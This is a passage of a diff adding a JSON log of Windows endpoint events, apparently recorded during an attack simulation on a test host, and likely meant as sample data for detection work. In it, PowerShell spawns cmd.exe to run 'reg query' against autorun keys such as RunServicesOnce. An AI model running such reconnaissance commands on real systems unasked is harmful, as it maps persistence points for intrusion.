"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "findstr.exe", + "image_path": "C:\\Windows\\System32\\findstr.exe", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "file", + "file_name": "SEARCHPROTOCOLHOST.EXE-AFAD3EF9.pf", + "file_path": "C:\\Windows\\Prefetch\\SEARCHPROTOCOLHOST.EXE-AFAD3EF9.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883571016990000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "SEARCHFILTERHOST.EXE-AA7A1FDD.pf", + "file_path": "C:\\Windows\\Prefetch\\SEARCHFILTERHOST.EXE-AA7A1FDD.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883571017150000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "FINDSTR.EXE-4176B665.pf", + "file_path": "C:\\Windows\\Prefetch\\FINDSTR.EXE-4176B665.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883571115420000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571148710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571148710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571148710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883571200110000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 131883571200110000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "process", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571308240000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "event_type": "process", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "subtype": "terminate", + "timestamp": 131883571308240000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "process", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571308240000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3880, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571308400000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "event_type": "process", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4708, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571310950000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6392, + "ppid": 4708, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571311040000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "process", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "process", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7316, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571311200016, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 400, + "ppid": 7316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571311299984, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001020A95001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "process", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "process", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5512, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571311439984, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", 